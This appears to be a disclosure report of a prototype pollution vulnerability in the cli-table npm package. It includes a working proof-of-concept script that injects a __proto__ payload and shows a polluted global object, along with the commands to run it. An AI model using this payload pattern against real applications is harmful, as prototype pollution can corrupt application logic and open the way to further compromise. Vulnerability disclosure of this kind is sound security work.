Prototype Pollution in automattic/cli-table

Valid

Reported on

Mar 11th 2021


Description

Prototype Pollution in cli-table

Proof of Concept

  1. Create the following PoC file:
// poc.js
var cliTable = require("cli-table")
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {}
console.log("Before : " + {}.polluted);
cliTable(payload);
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i cli-table # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation